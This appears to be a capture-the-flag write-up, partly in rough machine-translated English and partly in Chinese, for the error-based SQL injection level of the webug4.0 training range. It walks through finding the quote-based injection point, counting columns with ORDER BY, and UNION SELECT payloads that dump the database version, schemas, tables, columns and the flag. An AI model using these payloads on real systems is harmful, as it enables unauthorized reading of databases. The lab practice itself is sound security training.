webug4.0 significant error injection -1

webug4.0 significant error injection -1

Some small knowledge

1. concat (str1, str2, ...) returns a value between no interval parameter string for connecting, wherein if a parameter is NULL, the result returned is NULL
2. concat_ws (separator, str1, str2, ...) connected to a string containing the delimiter, the first parameter is established delimiter
3. group_concat (str1, str2, ...) connected to a string of all groups, and each of the data separated by commas
4. The results set for merging two or more union select statement should be noted that the interior of the union select shall have the same number of columns, and the data type of the column should be the same.

5. General process of injection: input point -> Database -> Data Table -> data columns -> data items 

   Enter the shooting range

   Look at the interface
   ip: 192.168.177.130/control/sqlinject/manifest_error.php id = 1?
   

See id = 1 = 2 Try the above mentioned id, the above mentioned id = 3
the above mentioned id = 2:

id=3:

Contrast can guess:

The rear end of the website to get the page id outputted to the search, if no results, the corresponding position no results, such as when id = 3

Looking injection point

Error injection, id = 3, guess the next SQL statement is:

select * from table where id = $ id + (rear limit may have nested query statement or the like, so these may be customary interference shielding statement followed by injection comment symbol)

Then one by one to try single and double quotation marks, parentheses, and their mutual combinations:

url? id = 1 'when an error
Invalid query: SELECT * FROM sqlinjection WHERE id = '1''

Found injection point, determine the number of order by using the field, it is convenient to know the union with
http://localhost/control/sqlinject/manifest_error.php?id=1' order by 1%23

Try from the 1, 3 pages to find the error, and therefore determine the number of field 2 (see online Gangster wp is the use of dichotomy query, so much time in the field easier to check out, wuwuwu really too dishes )

Let's look at the data we want in the first few columns
payloa:id=3' union select 1,2%23

在第二列。到了这里就完了，接下来我们可以利用这个注入点获取我们想要的信息了。
做这一步是因为 UNION 结果集中的列名总是等于 UNION 中第一个 SELECT 语句中的列名，后端会将查到的一个列输出出来，如图。

比如查询用户名：id=3%27%20union%20select%201,user()%23

查询flag

1.查询mysql版本
payload：id=3' union select 1,version() %23

版本大于15的话mysql里面就有information_schema这个数据库，我们可以通过这个数据库获取到mysql里各个数据库及其表和字段的信息

2.确认mysql中有哪些数据库

由于页面显示只有一个字段，而我们查出来的数据库肯定有多个。所以这里我们需要用到一个函数GROUP_CONCAT来组合多个数据。

payload:
id=3' UNION SELECT 1,GROUP_CONCAT(schema_name) FROM information_schema.SCHEMATA %23

查看当前数据库
payload:id=3' UNION SELECT 1,database()%23

先查查有哪些表再说

payload:
id=3' UNION SELECT 1,GROUP_CONCAT(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA =%20 'webug'%23

哈哈哈发现有个flag表

确认表的字段

payload:
id=3' UNION SELECT 1,GROUP_CONCAT(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME='flag'%23

看看吧

payload:id=3' UNION SELECT 1,id from webug.flag%23

payload:id=3' UNION SELECT 1,flag from webug.flag%23

得到flag，打开靶场提交，显示flag正确